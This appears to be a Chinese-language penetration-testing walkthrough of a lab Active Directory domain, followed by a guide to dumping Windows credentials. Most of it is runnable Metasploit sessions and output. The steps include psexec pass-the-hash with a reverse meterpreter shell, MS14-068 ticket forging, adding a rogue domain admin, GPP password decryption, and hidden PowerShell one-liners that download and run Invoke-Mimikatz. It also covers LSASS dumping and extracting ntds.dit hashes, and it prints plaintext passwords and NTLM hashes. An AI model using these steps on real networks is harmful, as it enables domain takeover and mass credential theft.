    msf post(sso) > run
    [/i][/i][i][i] Running module against DATABASE
    [-] x64 platform requires x64 meterpreter and mimikatz extension[/i][/i][i][i] Post module execution completed
    
    meterpreter > load mimikatz
    Loading extension mimikatz...
    [!] Loaded x86 Mimikatz on an x64 architecture.
    success.

    我们有一个meterpreter shell,并dump了Windows用户哈希。 当我们使用mimikatz时,它向我们展示了“在x64架构上加载x86 Mimikatz”。 目标是Windows 2008 x64,并且需要x64 meterpreter shell.

    散列在这里,我们可以使用exploit/windows/smb/p**ec来exploit目标。

    msf exploit(p**ec) > show options
    
    Module options (exploit/windows/smb/p**ec):
    
       Name                  Current Setting                                                    Required  Description
       ----                  ---------------                                                    --------  -----------
       RHOST                 10.1.222.200                                                       yes       The target address
       RPORT                 445                                                                yes       Set the SMB service port
       SERVICE_DESCRIPTION                                                                      no        Service description to to be used on target for pretty listing
       SERVICE_DISPLAY_NAME                                                                     no        The service display name
       SERVICE_NAME                                                                             no        The service name
       SHARE                 ADMIN$                                                             yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
       SMBDomain             WORKGROUP                                                          no        The Windows domain to use for authentication
       SMBPass               aad3b435b51404eeaad3b435b51404ee:68f8b3e056dc171163f597288f47607e  no        The password for the specified username
       SMBUser               administrator                                                      no        The username to authenticate as
    
    Payload options (windows/x64/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
       LHOST     10.255.254.23    yes       The listen address
       LPORT     8090             yes       The listen port
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    msf exploit(p**ec) > run
    [/i][/i][i][i] Started reverse handler on 10.255.254.23:8090[/i][/i][i][i] Connecting to the server...[/i][/i][i][i] Authenticating to 10.1.222.200:445|WORKGROUP as user 'administrator'...[/i][/i][i][i] Uploading payload...[/i][/i][i][i] Created \kNXUXXOu.exe...
    [+] 10.1.222.200:445 - Service started successfully...[/i][/i][i][i] Sending stage (1105970 bytes) to 10.1.222.200[/i][/i][i][i] Deleting \kNXUXXOu.exe...[/i][/i][i][i] Meterpreter session 2 opened (10.255.254.23:8090 -> 10.1.222.200:56977) at 2015-09-08 13:41:18 +0000
    
    meterpreter > load mimikatz
    Loading extension mimikatz...meterpreter >

    BINGO !

    10.1.222.201

    使用Administrator / 6GbA6Crdw访问10.1.222.201。 在管理员的桌面上,这里是一个mstsc客户端。

    C:\Users\Desktop\Administrator\mstsc

    MS14-068
    用ms14-068升级 Windows域管理员权限。 我们需要从10.1.222.200访问10.1.222.201。

    msf exploit(p**ec) > route add 10.1.222.201 255.255.255.255 2

    会话1是x86 meterpreter shell,会话2是x64 meterpreter shell。 Pwn 10.1.222.201与exploit/windows/smb/p**ec再次如下。

    msf exploit(p**ec) > sessions -l
    
    Active sessions
    ===============
    
      Id  Type                   Information                     Connection
      --  ----                   -----------                     ----------
      1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DATABASE  10.255.254.23:8088 -> 10.1.222.200:56671 (10.1.222.200)
      2   meterpreter x64/win64  NT AUTHORITY\SYSTEM @ DATABASE  10.255.254.23:8090 -> 10.1.222.200:56977 (10.1.222.200)
      3   meterpreter x64/win64  NT AUTHORITY\SYSTEM @ MASTER    10.255.254.23-10.1.222.200:0 -> 10.1.222.201:8090 (10.1.222.201)
    

    我们需要从10.1.222.201访问Windows DC - 10.1.222.202。 利用ms14-068渗透Windows DC:

    msf auxiliary(ms14_068_kerberos_checksum) > show options
    
    Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
    
       Name      Current Setting                               Required  Description
       ----      ---------------                               --------  -----------
       DOMAIN    PENTEST.COM                                   yes       The Domain (upper case) Ex: DEMO.LOCAL
       PASSWORD  file:/tmp/pass.txt                            yes       The Domain User password
       RHOST     10.1.222.202                                  yes       The target address
       RPORT     88                                            yes       The target port
       Timeout   10                                            yes       The TCP timeout to establish connection and read data
       USER      MASTER                                        yes       The Domain User
       USER_SID  S-1-5-21-30580861-1793299886-3410204933-1008  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
    
    msf auxiliary(ms14_068_kerberos_checksum) > run
    [/i][/i][i][i] Validating options...[/i][/i][i][i] Using domain PENTEST.COM...[/i][/i][i][i] 10.1.222.202:88 - Sending AS-REQ...
    [!] 10.1.222.202:88 - KDC_ERR_PREAUTH_FAILED - Pre-authentication information was invalid
    [-] 10.1.222.202:88 - Invalid AS-REP, aborting...[/i][/i][i][i] Auxiliary module execution completed
    
    C:\Windows\system32>wmic useraccount get name,sid
    wmic useraccount get name,sid
    Name           SID                                           
    Administrator  S-1-5-21-30580861-1793299886-3410204933-500   
    Guest          S-1-5-21-30580861-1793299886-3410204933-501   
    Administrator  S-1-5-21-30580861-1793299886-3410204933-500   
    Guest          S-1-5-21-30580861-1793299886-3410204933-501   
    krbtgt         S-1-5-21-30580861-1793299886-3410204933-502   
    hanlei         S-1-5-21-30580861-1793299886-3410204933-1110  
    ctfcx          S-1-5-21-30580861-1793299886-3410204933-1111

    metasploit无法利用MS14-068漏洞。 再次尝试pykek。

    C:\Users\Administrator\Desktop\pykek-master>C:\Python27\python.exe ms14-068.py -u master@PENTEST.COM -s S-1-5-21-30580861-1793299886-3410204933-1008 -d DC.PENTEST.COM
    Password:
      [+] Building AS-REQ for DC.PENTEST.COM... Done !
      [+] Sending AS-REQ to DC.PENTEST.COM... Done!
      [+] Receiving AS-REP from DC.PENTEST.COM... Done!
      [+] Parsing AS-REP from DC.PENTEST.COM... Done!
      [+] Building TGS-REQ for DC.PENTEST.COM... Done!
      [+] Sending TGS-REQ to DC.PENTEST.COM... Done!
      [+] Receiving TGS-REP from DC.PENTEST.COM... Done!
      [+] Parsing TGS-REP from DC.PENTEST.COM... Done!
      [+] Creating ccache file 'TGT_master@PENTEST.COM.ccache'... Done!
    :\Users\Administrator\Desktop\mimikatz_trunk\x64>mimikatz.exe
    mimikatz.exe
    
      .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48)
     .## ^ ##.  
     ## / \ ##  /* * *
     ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
      '#####'                                     with 16 modules * * */
    
    mimikatz # kerberos::ptc TGT_master@PENTEST.COM.ccache
    
    Principal : (01) : MASTER ; @ PENTEST.COM
    
    Data 0
               Start/End/MaxRenew: 2015/9/8 22:55:52 ; 2015/9/9 8:55:52 ; 2015/9/15 22:55:52
               Service Name (01) : krbtgt ; PENTEST.COM ; @ PENTEST.COM
               Target Name  (01) : krbtgt ; PENTEST.COM ; @ PENTEST.COM
               Client Name  (01) : MASTER ; @ PENTEST.COM
               Flags 50a00000    : pre_authent ; renewable ; proxiable ; forwardable ;
               Session Key       : 0x00000017 - rc4_hmac_nt      
                 e42591d39858f8e3b0d16334351b692d
               Ticket            : 0x00000000 - null              ; kvno = 2        [...]
               * Injecting ticket : OK
    
    mimikatz # exit
    Bye!
    
    C:\Users\Administrator\Desktop\mimikatz_trunk\x64>klist
    klist
    
    ��ǰ��¼ ID �� 0:0x3e7
    
    ������Ʊ֤: (1)
    
    #0>        �ͻ���: MASTER @ PENTEST.COM
            ������: krbtgt/PENTEST.COM @ PENTEST.COM
            Kerberos Ʊ֤��������: RSADSI RC4-HMAC(NT)
            Ʊ֤��־ 0x50a00000 -> forwardable proxiable renewable pre_authent
            ��ʼʱ��: 9/8/2015 22:55:52 (����)
            ����ʱ��:   9/9/2015 8:55:52 (����)
            ����ʱ��: 9/15/2015 22:55:52 (����)
            �Ự��Կ����: RSADSI RC4-HMAC(NT)

    hoho! 我们得到域管理员权限。

    C:\Users\Administrator\Desktop\mimikatz_trunk\x64>net user /domain
    net user /domain
    �������������� pentest.com ����������������
    
    \\DC.pentest.com ���û��ʻ�
    
    -------------------------------------------------------------------------------
    Administrator            ctfcx                    Guest                    
    hanlei                   krbtgt                   
    �����������ϣ�������һ�����������
    
    C:\Users\Administrator\Desktop\mimikatz_trunk\x64>net group "DOMAIN ADMINS" /domain
    net group "DOMAIN ADMINS" /domain
    �������������� pentest.com ����������������
    
    ����     Domain Admins
    ע��     ָ����������Ա
    
    ��Ա
    
    C:\Users\Administrator\Desktop\mimikatz_trunk\x64>net use \\DC.PENTEST.COM\ipc$
    net use \\DC.PENTEST.COM\ipc$
    �����ɹ����ɡ�
    
    C:\Users\Administrator\Desktop\mimikatz_trunk\x64>dir \\DC.PENTEST.COM\c$\
    dir \\DC.PENTEST.COM\c$\
     ������ \\DC.PENTEST.COM\c$ �еľ�û�б�ǩ��
     ��������� 403D-792F
    
     \\DC.PENTEST.COM\c$ ��Ŀ¼
    
    2015/08/19  10:25    <DIR>          inetpub
    2009/07/14  11:20    <DIR>          PerfLogs
    2015/08/13  14:58    <DIR>          Program Files
    2015/08/13  14:58    <DIR>          Program Files (x86)
    2015/09/08  09:20    <DIR>          Users
    2015/08/24  16:56    <DIR>          Windows
                   0 ���ļ�              0 �ֽ
                   6 ��Ŀ¼ 25,048,915,968 �����ֽ
    
    -------------------------------------------------------------------------------
    Administrator            ctfcx                    
    �����ɹ����ɡ�

    Read Flags

    C:\>klist
    C:\>net use \\DC.pentest.com\admin$
    C:\>net use k: \\DC.pentest.com\c$
    C:\>type k:\file.sys

    Flags 如下:

    Hi dude, Congratulations!
    
    You have my ass!!
    
    this is the flag:4b329655c2275d7c956083dc899b1c89
    
    Have a good day!

    Add A Domain Administrator

    C:\Users\Administrator\Desktop\mimikatz_trunk\x64>net user demo pasPAS1234~ /add /domain
    net user demo pasPAS1234~ /add /domain
    �������������� pentest.com ����������������
    
    �����ɹ����ɡ�
    
    C:\Users\Administrator\Desktop\mimikatz_trunk\x64>net group "DOMAIN ADMINS" demo /add /domain
    net group "DOMAIN ADMINS" demo /add /domain
    �������������� pentest.com ����������������
    
    �����ɹ����ɡ�

    10.1.222.202

    用 demo/pasPAS1234~ 干掉 windows DC :

    meterpreter > ssp
    [+] Running as SYSTEM[/i][/i][i][i] Retrieving ssp credentials
    ssp credentials
    ===============
    
    AuthID  Package  Domain  User  Password
    ------  -------  ------  ----  --------
    
    meterpreter > msv
    [+] Running as SYSTEM[/i][/i][i][i] Retrieving msv credentials
    msv credentials
    ===============
    
    AuthID     Package    Domain        User           Password
    ------     -------    ------        ----           --------
    0;996      Negotiate  PENTEST       DC$            lm{ 00000000000000000000000000000000 }, ntlm{ 5b2a87a70eb71e5adedf4209f478dca0 }
    0;35844    NTLM                                    lm{ 00000000000000000000000000000000 }, ntlm{ 5b2a87a70eb71e5adedf4209f478dca0 }
    0;145416   Kerberos   PENTEST       administrator  lm{ 00000000000000000000000000000000 }, ntlm{ 68a02ebe899dcb737cefa52adc48cafd }
    0;1278946  Negotiate  PENTEST       demo           lm{ fdc5a70a13943d6273d1c29094e34430 }, ntlm{ 2ba4387de08ea1e1ee36d2a18c54b40c }
    0;1278920  Kerberos   PENTEST       demo           lm{ fdc5a70a13943d6273d1c29094e34430 }, ntlm{ 2ba4387de08ea1e1ee36d2a18c54b40c }
    0;997      Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
    0;999      Negotiate  PENTEST       DC$            n.s. (Credentials KO)
    
    meterpreter > livessp
    [+] Running as SYSTEM[/i][/i][i][i] Retrieving livessp credentials
    livessp credentials
    ===================
    
    AuthID     Package    Domain        User           Password
    ------     -------    ------        ----           --------
    0;1278946  Negotiate  PENTEST       demo           n.a. (livessp KO)
    0;1278920  Kerberos   PENTEST       demo           n.a. (livessp KO)
    0;145416   Kerberos   PENTEST       administrator  n.a. (livessp KO)
    0;996      Negotiate  PENTEST       DC$            n.a. (livessp KO)
    0;35844    NTLM                                    n.a. (livessp KO)
    0;997      Negotiate  NT AUTHORITY  LOCAL SERVICE  n.a. (livessp KO)
    0;999      Negotiate  PENTEST       DC$            n.a. (livessp KO)
    
    meterpreter > kerberos
    [+] Running as SYSTEM[/i][/i][i][i] Retrieving kerberos credentials
    kerberos credentials
    ====================
    
    AuthID     Package    Domain        User           Password
    ------     -------    ------        ----           --------
    0;35844    NTLM                                    
    0;997      Negotiate  NT AUTHORITY  LOCAL SERVICE  
    0;999      Negotiate  PENTEST       DC$            77 e7 00 bd c7 4e 10 ed 24 6f d0 a6 96 c4 38 0e 1d 11 70 d1 e1 09 1c 83 da 08 a5 fc e8 57 f1 6f 78 66 d8 bf 60 fd fb 18 56 ea 1a f7 06 b8 fa fd 9a d7 1d 61 44 9a ee ea 81 57 73 b7 c2 1d d2 ba 6b bb ec f1 97 f1 26 1b fc 2e e6 a3 21 90 62 7b f1 5b 72 4e c2 43 cc 74 cb 98 f9 7f 74 66 4e 04 fa b1 a4 71 4e 69 50 37 bc 3e 7b 8f 25 75 10 01 8e aa 99 62 72 96 e7 69 66 24 b4 57 a6 ce 49 cb b3 8e a0 fa e7 c2 05 d8 cb b1 55 07 2f 34 6e b9 de ae 4e 5d 98 d2 6f 56 56 0a 8e 6f 99 d2 d0 cf 2c 19 70 d9 2a 49 ba 49 8f 77 bf 15 85 74 a2 98 e4 99 df d4 3d 1c d4 35 c6 3b 0c 84 d7 e8 48 bf 0b 5b 62 b8 e5 0b 42 cd 5b 17 5f d9 13 9c 1e 5e 0c 44 d5 00 83 3b 5f f9 83 66 98 6d 6a e5 15 8f 27 35 82 bc 2e 52 e5 59 a2 17 5c 09 5a a9 56 a0
    0;996      Negotiate  PENTEST       DC$            77 e7 00 bd c7 4e 10 ed 24 6f d0 a6 96 c4 38 0e 1d 11 70 d1 e1 09 1c 83 da 08 a5 fc e8 57 f1 6f 78 66 d8 bf 60 fd fb 18 56 ea 1a f7 06 b8 fa fd 9a d7 1d 61 44 9a ee ea 81 57 73 b7 c2 1d d2 ba 6b bb ec f1 97 f1 26 1b fc 2e e6 a3 21 90 62 7b f1 5b 72 4e c2 43 cc 74 cb 98 f9 7f 74 66 4e 04 fa b1 a4 71 4e 69 50 37 bc 3e 7b 8f 25 75 10 01 8e aa 99 62 72 96 e7 69 66 24 b4 57 a6 ce 49 cb b3 8e a0 fa e7 c2 05 d8 cb b1 55 07 2f 34 6e b9 de ae 4e 5d 98 d2 6f 56 56 0a 8e 6f 99 d2 d0 cf 2c 19 70 d9 2a 49 ba 49 8f 77 bf 15 85 74 a2 98 e4 99 df d4 3d 1c d4 35 c6 3b 0c 84 d7 e8 48 bf 0b 5b 62 b8 e5 0b 42 cd 5b 17 5f d9 13 9c 1e 5e 0c 44 d5 00 83 3b 5f f9 83 66 98 6d 6a e5 15 8f 27 35 82 bc 2e 52 e5 59 a2 17 5c 09 5a a9 56 a0
    0;145416   Kerberos   PENTEST       administrator  This is long Password!@#
    0;1278920  Kerberos   PENTEST       demo           pasPAS1234~
    0;1278946  Negotiate  PENTEST       demo           pasPAS1234~

    How-to-dump-windows2012-credentials

    SYSVOL和组策略首选项中的密码

    这种方法是最简单的,因为不需要特殊的黑客工具。 攻击者所要做的就是打开Windows资源管理器,搜索XML文件的SYSVOL DFS共享域。 大多数情况下,以下XML文件将包含凭据:groups.xml,scheduledtasks.xml和&Services.xml。

    SYSVOL是所有经过身份验证的用户具有读取权限的Active Directory中的域范围共享。 SYSVOL包含登录脚本,组策略数据和其他域控制器数据,这些数据在任何有域控制器的地方都可用(因为SYSVOL是在所有域控制器之间自动同步和共享的)。 所有域组策略都存储在这里:\\SYSVOL<DOMAIN>\Policies\
    当创建一个新的GPP时,会在SYSVOL中创建一个关联的XML文件以及相关的配置数据,如果提供了密码,那么它是AES-256位加密的,应该足够强。

    除了2012年之前,微软在MSDN上发布了AES加密密钥(共享密钥),可以用来解密密码。 由于经过身份验证的用户(任何域用户或受信任域中的用户)具有对SYSVOL的读取权限,因此域中的任何人都可以搜索SYSVOL共享中包含cpassword的XML文件,该密码是包含AES加密密码的值。

    通过访问这个XML文件,攻击者可以使用AES私钥解密GPP密码。 PowerSploit函数Get-GPPPassword对于组策略首选项开发非常有用。 这里的屏幕截图显示了一个类似的PowerShell函数,它可以从SYSVOL中的XML文件中加密GPP密码。

    PS C:\Users\Administrator\Desktop> IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1")
    PS C:\Users\Administrator\Desktop> Get-GPPPassword
    msf post(gpp) > show options
    
    Module options (post/windows/gather/credentials/gpp):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       ALL      true             no        Enumerate all domains on network.
       DOMAINS  THEGEEKSTUFF     no        Enumerate list of space seperated domains DOMAINS="dom1 dom2".
       SESSION  1                yes       The session to run this module on.
       STORE    true             no        Store the enumerated files in loot.
    
    msf post(gpp) > run
    [/i][/i][i][i] Checking for group policy history objects...
    [-] Error accessing C:\ProgramData\Microsoft\Group Policy\History : stdapi_fs_ls: Operation failed: The system cannot find the path specified.[/i][/i][i][i] Checking for SYSVOL locally...
    [+] SYSVOL Group Policy Files found locally[/i][/i][i][i] Enumerating the user supplied Domain(s): THEGEEKSTUFF...[/i][/i][i][i] Enumerating DCs for THEGEEKSTUFF on the network...
    [-] ERROR_NO_BROWSER_SERVERS_FOUND
    [-] No Domain Controllers found for THEGEEKSTUFF[/i][/i][i][i] Searching for Group Policy XML Files...[/i][/i][i][i] Post module execution completed
    metasploit-framework [rapid7-master] ->> ./tools/password/cpassword_decrypt.rb j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
    [+] The decrypted AES password is: Local*P4ssword!

    要么

    你也可以用gpp_password_decrypt.py来做。

    Dump credentials with Invoke-Mimikatz

    Invoke-Mimikatz应该能够通过安装了PowerShell v2或更高版本的Windows 8.1从任何版本的Windows dump 凭据。

    PS C:\Users\Administrator\Desktop> IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1")
    PS C:\Users\Administrator\Desktop> Invoke-Mimikatz

    or

    C:\Windows\system32> powershell.exe -exec bypass -windows hidden -c IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1");Invoke-Mimikatz

    使用任务管理器(获取域管理员凭据)dump LSASS内存

    一旦LSASS被dump,Mimikatz可以被用来从另一个系统上的LSASS.dmp文件中提取已登录的凭据。 在域控制器上,这几乎都是域管理员的凭据。

    PS C:\Users\Administrator\Desktop\MimikatzX64> .\mimikatz.exe
    
      .#####.   mimikatz 2.1 (x64) built on Oct 29 2016 21:27:40
     .## ^ ##.  "A La Vie, A L'Amour"
     ## / \ ##  /* * *
     ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
      '#####'                                     with 20 modules * * */
    
    mimikatz # sekurlsa::minidump C:\Users\Administrator\Desktop\lsass.DMP
    Switch to MINIDUMP : 'C:\Users\Administrator\Desktop\lsass.DMP'
    
    mimikatz # sekurlsa::logonpasswords
    Opening : 'C:\Users\Administrator\Desktop\lsass.DMP' file for minidump...
    
    Authentication Id : 0 ; 391874 (00000000:0005fac2)
    Session           : Interactive from 1
    User Name         : Administrator
    Domain            : THEGEEKSTUFF
    Logon Server      : SERVER
    Logon Time        : 2016/11/5 12:08:54
    SID               : S-1-5-21-2783134295-2946968820-3756090084-500
            msv :
             [00000003] Primary
             * Username : Administrator
             * Domain   : THEGEEKSTUFF
             * NTLM     : fc1fc80e9f128261a6bc463cb31e65b5
             * SHA1     : 9fb867ff5ae033514134f54b5bacfa209d135125
             [00010000] CredentialKeys
             * NTLM     : fc1fc80e9f128261a6bc463cb31e65b5
             * SHA1     : 9fb867ff5ae033514134f54b5bacfa209d135125
            tspkg :
            wdigest :
             * Username : Administrator
             * Domain   : THEGEEKSTUFF
             * Password : (null)
            kerberos :
             * Username : Administrator
             * Domain   : THEGEEKSTUFF.COM
             * Password : (null)
            ssp :   KO
            credman :
    
    Authentication Id : 0 ; 66164 (00000000:00010274)
    Session           : Interactive from 1
    User Name         : DWM-1
    Domain            : Window Manager
    Logon Server      : (null)
    Logon Time        : 2016/11/5 12:07:53
    SID               : S-1-5-90-1
            msv :
             [00000003] Primary
             * Username : SERVER$
             * Domain   : THEGEEKSTUFF
             * NTLM     : 708faf9c9842a10735ecab33cc64ed37
             * SHA1     : 170fc50c1613bc049225066bba08514ac35f1bce
            tspkg :
            wdigest :
             * Username : SERVER$
             * Domain   : THEGEEKSTUFF
             * Password : (null)
            kerberos :
             * Username : SERVER$
             * Domain   : thegeekstuff.com
             * Password : 0c f1 e2 be 81 2f 1e 4d a2 90 14 dc 84 1f c1 8c 41 0e e3 9b 7d 49 49 30 c8 63 b4 59 a9 d2 9e 08 e1
     aa 9c 40 dc 5b c8 17 42 7e a7 7f e4 f6 9f 1d 80 a7 ee 1c 00 7e 19 ce 5b 4a b4 53 f4 7f 45 8f 49 71 03 a6 55 12 0e c4 3f
     9d 87 a4 0d ca 5c bd 6d eb 6f 4e cb d7 3f 8c e9 39 07 26 65 fc c6 ac cb 81 31 7f 55 dd ac 8a 49 1d 16 a8 79 8b 2d 33 b7
     2d 42 f5 19 a5 17 32 56 88 c0 e2 08 50 62 0b c9 f2 e9 47 13 cb 72 20 d3 b2 b7 ba f3 54 c4 27 86 2c 71 b3 33 dc 9d 77 ff
     27 16 43 5c 8e fb fa ab 89 e0 f8 ae f1 b1 be 58 c0 e5 7b 76 a9 d4 80 37 18 6d 47 0d 7e 2b aa 0c cd b5 cb be 77 21 77 d1
     52 d8 ba 5a 0f 5d 0e 74 7c 97 05 00 27 a0 51 cb 3b 95 d5 a7 55 37 49 0d 84 7a f6 d8 96 30 d3 06 a8 cb a3 91 8e 98 ad b7
     8a 86 a9 c8 b8 ea c3
            ssp :   KO
            credman :
    
    Authentication Id : 0 ; 996 (00000000:000003e4)
    Session           : Service from 0
    User Name         : SERVER$
    Domain            : THEGEEKSTUFF
    Logon Server      : (null)
    Logon Time        : 2016/11/5 12:07:53
    SID               : S-1-5-20
            msv :
             [00000003] Primary
             * Username : SERVER$
             * Domain   : THEGEEKSTUFF
             * NTLM     : 708faf9c9842a10735ecab33cc64ed37
             * SHA1     : 170fc50c1613bc049225066bba08514ac35f1bce
            tspkg :
            wdigest :
             * Username : SERVER$
             * Domain   : THEGEEKSTUFF
             * Password : (null)
            kerberos :
             * Username : server$
             * Domain   : THEGEEKSTUFF.COM
             * Password : (null)
            ssp :   KO
            credman :
    
    Authentication Id : 0 ; 997 (00000000:000003e5)
    Session           : Service from 0
    User Name         : LOCAL SERVICE
    Domain            : NT AUTHORITY
    Logon Server      : (null)
    Logon Time        : 2016/11/5 12:07:54
    SID               : S-1-5-19
            msv :
            tspkg :
            wdigest :
             * Username : (null)
             * Domain   : (null)
             * Password : (null)
            kerberos :
             * Username : (null)
             * Domain   : (null)
             * Password : (null)
            ssp :   KO
            credman :
    
    Authentication Id : 0 ; 66429 (00000000:0001037d)
    Session           : Interactive from 1
    User Name         : DWM-1
    Domain            : Window Manager
    Logon Server      : (null)
    Logon Time        : 2016/11/5 12:07:53
    SID               : S-1-5-90-1
            msv :
             [00000003] Primary
             * Username : SERVER$
             * Domain   : THEGEEKSTUFF
             * NTLM     : 708faf9c9842a10735ecab33cc64ed37
             * SHA1     : 170fc50c1613bc049225066bba08514ac35f1bce
            tspkg :
            wdigest :
             * Username : SERVER$
             * Domain   : THEGEEKSTUFF
             * Password : (null)
            kerberos :
             * Username : SERVER$
             * Domain   : thegeekstuff.com
             * Password : 0c f1 e2 be 81 2f 1e 4d a2 90 14 dc 84 1f c1 8c 41 0e e3 9b 7d 49 49 30 c8 63 b4 59 a9 d2 9e 08 e1
     aa 9c 40 dc 5b c8 17 42 7e a7 7f e4 f6 9f 1d 80 a7 ee 1c 00 7e 19 ce 5b 4a b4 53 f4 7f 45 8f 49 71 03 a6 55 12 0e c4 3f
     9d 87 a4 0d ca 5c bd 6d eb 6f 4e cb d7 3f 8c e9 39 07 26 65 fc c6 ac cb 81 31 7f 55 dd ac 8a 49 1d 16 a8 79 8b 2d 33 b7
     2d 42 f5 19 a5 17 32 56 88 c0 e2 08 50 62 0b c9 f2 e9 47 13 cb 72 20 d3 b2 b7 ba f3 54 c4 27 86 2c 71 b3 33 dc 9d 77 ff
     27 16 43 5c 8e fb fa ab 89 e0 f8 ae f1 b1 be 58 c0 e5 7b 76 a9 d4 80 37 18 6d 47 0d 7e 2b aa 0c cd b5 cb be 77 21 77 d1
     52 d8 ba 5a 0f 5d 0e 74 7c 97 05 00 27 a0 51 cb 3b 95 d5 a7 55 37 49 0d 84 7a f6 d8 96 30 d3 06 a8 cb a3 91 8e 98 ad b7
     8a 86 a9 c8 b8 ea c3
            ssp :   KO
            credman :
    
    Authentication Id : 0 ; 44395 (00000000:0000ad6b)
    Session           : UndefinedLogonType from 0
    User Name         : (null)
    Domain            : (null)
    Logon Server      : (null)
    Logon Time        : 2016/11/5 12:07:52
    SID               :
            msv :
             [00000003] Primary
             * Username : SERVER$
             * Domain   : THEGEEKSTUFF
             * NTLM     : 708faf9c9842a10735ecab33cc64ed37
             * SHA1     : 170fc50c1613bc049225066bba08514ac35f1bce
            tspkg :
            wdigest :
            kerberos :
            ssp :   KO
            credman :
    
    Authentication Id : 0 ; 999 (00000000:000003e7)
    Session           : UndefinedLogonType from 0
    User Name         : SERVER$
    Domain            : THEGEEKSTUFF
    Logon Server      : (null)
    Logon Time        : 2016/11/5 12:07:52
    SID               : S-1-5-18
            msv :
            tspkg :
            wdigest :
             * Username : SERVER$
             * Domain   : THEGEEKSTUFF
             * Password : (null)
            kerberos :
             * Username : server$
             * Domain   : THEGEEKSTUFF.COM
             * Password : (null)
            ssp :   KO
            credman :
    
    mimikatz # exit
    Bye!
    PS C:\Users\Administrator\Desktop\MimikatzX64>

    使用NTDSUtil(抓取NTDS.dit文件)创建从媒体安装(IFM):

    NTDSUtil是本地处理AD DB的命令实用程序(ntds.dit),并为DCPromo启用IFM集创建。 IFM与DCPromo一起用于从媒体安装,因此被升级的服务器不需要通过网络从另一个DC复制域数据。 IFM集是在此实例中在c:\temp中创建的NTDS.dit文件的副本。

    这个文件可能会在一个共享上分享新的DC,或者可能在尚未推广的新服务器上找到。 此服务器可能无法正常保护。

    C:\Users\Administrator>ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
    ntdsutil: ac i ntds
    活动实例设置为“ntds”。
    ntdsutil: ifm
    ifm: create full c:\temp
    正在创建快照...
    成功生成快照集 {03d7e751-8489-4bee-b7c1-fde165f87426}。
    快照 {e236f8b9-10e5-4404-ac4d-843f1db29f1e} 已作为 C:\$SNAP_201611051210_VOLUMEC$\ 装载
    已装载快照 {e236f8b9-10e5-4404-ac4d-843f1db29f1e}。
    正在启动碎片整理模式...
         源数据库: C:\$SNAP_201611051210_VOLUMEC$\Windows\NTDS\ntds.dit
         目标数据库: c:\temp\Active Directory\ntds.dit
    
                      Defragmentation  Status (% complete)
    
              0    10   20   30   40   50   60   70   80   90  100
              |----|----|----|----|----|----|----|----|----|----|
              ...................................................
    
    正在复制注册表文件...
    正在复制 c:\temp\registry\SYSTEM
    正在复制 c:\temp\registry\SECURITY
    快照 {e236f8b9-10e5-4404-ac4d-843f1db29f1e} 已卸载。
    在 c:\temp 中成功创建 IFM 媒体。
    ifm: q
    ntdsutil: q

    从NTDS.dit中提取hash

    一旦攻击者拥有NTDS.dit文件的副本(以及某些注册表项来解密数据库文件中的安全元素),则可以提取Active Directory数据库文件中的凭据数据。

    从NTDS.dit文件中提取密码哈希的一种方法是Impacket的secretsdump.py(Kali等)。 只需要DC注册表中的ntds.dit文件和System配置文件(这两个文件都具有从ntdsutil设置的从介质安装(IFM))。

    $ git clone https://github.com/CoreSecurity/impacket/
    $ cd impacket/examples/
    $ secretsdump.py -system /home/seclab/windows-2012/ntds/registry/SYSTEM -security /home/seclab/windows-2012/ntds/registry/SECURITY -ntds /home/seclab/windows-2012/ntds/Active\ Directory/ntds.dit LOCAL
    Impacket v0.9.16-dev - Copyright 2002-2016 Core Security Technologies
    [/i][/i][i][i] Target system bootKey: 0xb6570f7db706f37a5b79e72ab8c44b8a[/i][/i][i][i] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)[/i][/i][i][i] Dumping LSA Secrets[/i][/i][i][i] $MACHINE.ACC
    $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:708faf9c9842a10735ecab33cc64ed37[/i][/i][i][i] DefaultPassword
    (Unknown User):ROOT#123[/i][/i][i][i] DPAPI_SYSTEM
     0000   01 00 00 00 8F 04 A9 BA  67 3B 83 81 09 62 0E 80   ........g;...b..
     0010   81 81 DB 99 FF 3E 7A F8  EE 80 BC 7F 8F C8 FA DE   .....>z.........
     0020   3D BE 24 6D 30 38 84 48  1A 5F B3 11               =.$m08.H._..[/i][/i][i][i] NL$KM
     0000   39 7B 96 FE 24 6D B9 58  44 A6 DF 78 77 F9 78 C9   9{..$m.XD..xw.x.
     0010   72 F8 57 E6 C9 60 65 07  50 F5 EA 81 D7 5B A1 D2   r.W..`e.P....[..
     0020   D3 46 E8 67 3F C1 C8 8C  44 91 EA 62 20 9E 5A 58   .F.g?...D..b .ZX
